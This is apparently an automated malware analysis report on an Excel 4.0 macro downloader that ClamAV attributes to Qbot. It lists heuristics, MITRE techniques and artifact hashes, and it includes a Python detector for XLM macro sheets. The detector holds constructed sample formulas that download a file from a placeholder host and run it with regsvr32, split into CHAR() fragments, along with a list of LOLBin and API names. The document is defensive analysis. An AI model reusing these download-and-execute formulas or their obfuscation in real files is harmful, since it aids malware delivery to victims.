Verdict: MALICIOUS
Risk Score: 180
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The file contains Excel 4.0 (XLM) macros, a legacy macro format that is rarely used legitimately and is widely abused for initial access. The recovered macro logic downloads a second-stage payload from the URLs http://aGertiokas1.ocx, http://aGertiokas2.ocx and http://aGertiokas3.ocx and executes it. The ClamAV detection name 'Xls.Downloader.Qbot02221-9940029-0' attributes the sample to the Qbot (QakBot) malware family, for which malicious XLS downloaders are a well-documented delivery stage.
Heuristics (3)

- Excel 4.0 macro sheet (13 sheet(s)) | critical | OOXML_XLM_MACROSHEET
  Spreadsheet contains an Excel 4.0 (XLM) macro sheet. XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.

- XLM payload reassembled from CHAR()/split formulas | critical | OOXML_XLM_REASSEMBLED_PAYLOAD
  An Excel 4.0 macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and string fragments, so no WinAPI name, shell command, or URL is ever contiguous in the .bin for a literal-bytes scan to find. Reassembling the formulas recovered download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell), or a payload URL: the de-obfuscated download-and-run kill chain.

- ClamAV: Xls.Downloader.Qbot02221-9940029-0 | critical | CLAMAV_DETECTION
  ClamAV detected this file as malware: Xls.Downloader.Qbot02221-9940029-0
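The two XLM heuristics above describe a container-level check (macro sheet parts hidden in BIFF12 .bin entries) and a formula-level check (strings split across CHAR() calls and fragments). The following Python is an added illustration of both, written for this report and not code from the analyzer or from the sample. The package it builds, the content-type strings in it, the formulas, the URL and the file paths are all constructed placeholders; the .bin bodies are not real BIFF12, and decoding BIFF12 formula records into text is deliberately left out, so the de-obfuscation helpers take formula text as input.

```python
import io
import re
import xml.etree.ElementTree as ET
import zipfile

# ---- 1. Container check: which OOXML parts are Excel 4.0 (XLM) macro sheets? ----

CT_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"

def macrosheet_parts(package_bytes):
    """Return the package parts that are XLM macro sheets, from two signals:
    the part path is under xl/macrosheets/, or [Content_Types].xml gives it a
    content type containing 'macrosheet' (assumption: XLSB and XLSM variants
    differ only in the '+xml' suffix). A .bin part is BIFF12: its formulas are
    not text, so a scanner that only opens XML parts never sees them."""
    found = set()
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as z:
        names = z.namelist()
        found.update(n for n in names if n.startswith("xl/macrosheets/"))
        if "[Content_Types].xml" in names:
            root = ET.fromstring(z.read("[Content_Types].xml"))
            for ov in root.iter(CT_NS + "Override"):
                if "macrosheet" in ov.get("ContentType", "").lower():
                    found.add(ov.get("PartName", "").lstrip("/"))
    return sorted(found)

# ---- 2. Formula de-obfuscation: rebuild strings split into CHAR()/fragments ----

_PIECE = r'(?:CHAR\(\d+\)|"(?:[^"]|"")*")'
_RUN = re.compile(_PIECE + r'(?:\s*&\s*' + _PIECE + r')*')
_TOKEN = re.compile(r'CHAR\((\d+)\)|"((?:[^"]|"")*)"')

def _join(run):
    """Evaluate one maximal &-chain of CHAR(n) calls and quoted fragments."""
    return "".join(chr(int(code)) if code else text.replace('""', '"')
                   for code, text in _TOKEN.findall(run))

def reassemble(formula):
    """Replace every &-chain of CHAR()/literal pieces with a single quoted
    literal, e.g. =EXEC(CHAR(114)&"egsvr32") -> =EXEC("regsvr32")."""
    return _RUN.sub(lambda m: '"' + _join(m.group(0)).replace('"', '""') + '"',
                    formula)

def literal_strings(formula):
    """Quoted literals visible after reassembly."""
    return [s.replace('""', '"')
            for s in re.findall(r'"((?:[^"]|"")*)"', reassemble(formula))]

LOLBINS = ("regsvr32", "rundll32", "mshta", "wmic", "powershell", "certutil")
APIS = ("urldownloadtofile", "shellexecute", "winexec", "createprocess")

def find_iocs(formulas):
    """URLs, LOLBins and download/execute API names across a list of formulas;
    none of them is visible until each formula has been reassembled."""
    text = " ".join(s for f in formulas for s in literal_strings(f))
    low = text.lower()
    return {
        "urls": re.findall(r'https?://[^\s"\'<>)]+', text),
        "lolbins": sorted(b for b in LOLBINS if b in low),
        "apis": sorted(a for a in APIS if a in low),
    }

# ---- Constructed sample formulas (placeholders, not the analysed file's content) ----

SAMPLE_FORMULAS = [
    # Download: API name and URL are both split so neither is contiguous on disk.
    '=CALL("urlmon",CHAR(85)&"RLDownload"&"ToFile"&CHAR(65),"JJCCJJ",0,'
    'CHAR(104)&"ttp:"&CHAR(47)&CHAR(47)&"example"&CHAR(46)&"invalid/x1"&CHAR(46)&"ocx",'
    '"C:\\Users\\Public\\x1"&CHAR(46)&"ocx",0,0)',
    # Execute: the LOLBin name is assembled from CHAR() pieces.
    '=EXEC(CHAR(114)&"egsv"&CHAR(114)&"32 /s C:\\Users\\Public\\x1"&CHAR(46)&"ocx")',
]

def build_sample_package():
    """Minimal constructed OOXML zip: one macro sheet declared by path only, one
    by content type; the .bin bodies are placeholders, not real BIFF12."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Override PartName="/xl/worksheets/sheet1.bin" ContentType="application/vnd.ms-excel.worksheet"/>'
        '<Override PartName="/xl/macrosheets/intlsheet1.bin" ContentType="application/vnd.ms-excel.intlmacrosheet"/>'
        '</Types>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("xl/worksheets/sheet1.bin", b"\x00placeholder")
        z.writestr("xl/macrosheets/sheet1.bin", b"\x00placeholder")
        z.writestr("xl/macrosheets/intlsheet1.bin", b"\x00placeholder")
    return buf.getvalue()

if __name__ == "__main__":
    print("macro sheets:", macrosheet_parts(build_sample_package()))
    for f in SAMPLE_FORMULAS:
        print("literal scan sees 'http://':", "http://" in f)
        print("reassembled:", reassemble(f))
    print("IOCs:", find_iocs(SAMPLE_FORMULAS))
```

Running it shows the point of the second heuristic: a byte scan of the raw formula text finds neither "http://" nor "regsvr32", while the reassembled form yields the URL, the LOLBin and the URLDownloadToFile API name in one pass. The container check is the cheaper first gate: any xl/macrosheets/ part in a workbook is worth a closer look regardless of what the formulas say.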
Extracted artifacts (13)
Files carved from inside the sample during analysis.
| Filename | SHA-256 | Kind | Source | Size |
|---|---|---|---|---|
| xlm_sheet_00.bin | 5fb5a9e6ec1dacc189efcc6a68093d9b5c376b223dcb27f862984427d2aac0e2 | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet1.bin | 363 bytes |
| xlm_sheet_01.bin | dbdd4c1c8ee187d7c5430fa758515ddd8be11b44c3b4435564e175e4a11d05c3 | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet2.bin | 792 bytes |
| xlm_sheet_02.bin | da4a3dd20598f5d8cf5375967227afea2603380fd81d339abf64327e3e444bad | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.bin | 2964 bytes |
| xlm_sheet_03.bin | 7a9cb9f51e53cfc400e9eca3f75c6728794c807d79bae3ce31a35ca308c38b42 | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet3.bin | 1248 bytes |
| xlm_sheet_04.bin | d7bed8c1f8d3057a1f3cf0b173e48bf44e4199fb1fc946acce5befaaa8bdb880 | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet4.bin | 619 bytes |
| xlm_sheet_05.bin | 4d4dd95373ceffcdeae0a74dfa09b90bd3ce229ab64dd70c7fe0f05e5b469bbd | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet5.bin | 648 bytes |
| xlm_sheet_06.bin | 8d957f41705fc5da60f409cd3c460bdb601935e6214bf78485f23a85cb252024 | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet6.bin | 622 bytes |
| xlm_sheet_07.bin | 000bc8d70715fdc1e9f90bbf8ea8d827eb7d942c3f16b2c5b6d16539d6622ba7 | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet7.bin | 446 bytes |
| xlm_sheet_08.bin | 3d7da882103e152fa19e77064137c97829f1e1a274c1affe1fac1b61da777fbd | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet2.bin | 801 bytes |
| xlm_sheet_09.bin | 617d9277b8cae5e22b22f75d36f1c1410a208c497dfd9b1fc50732ce8b8e39ba | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet8.bin | 423 bytes |
| xlm_sheet_10.bin | d5c4686b042d6a3a5b3054f9a908261594b4da3bb58f47c7667d2f76807eef6e | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet3.bin | 686 bytes |
| xlm_sheet_11.bin | d70f9ec0a416d2c5d576f663a61e87e9c0546f1f91643f12f3b384ea04845e91 | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet4.bin | 726 bytes |
| xlm_sheet_12.bin | 2bd138650fa507a83c5a96a8b7ece29759f24ed721eaf50eae3ada328413aacb | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet9.bin | 423 bytes |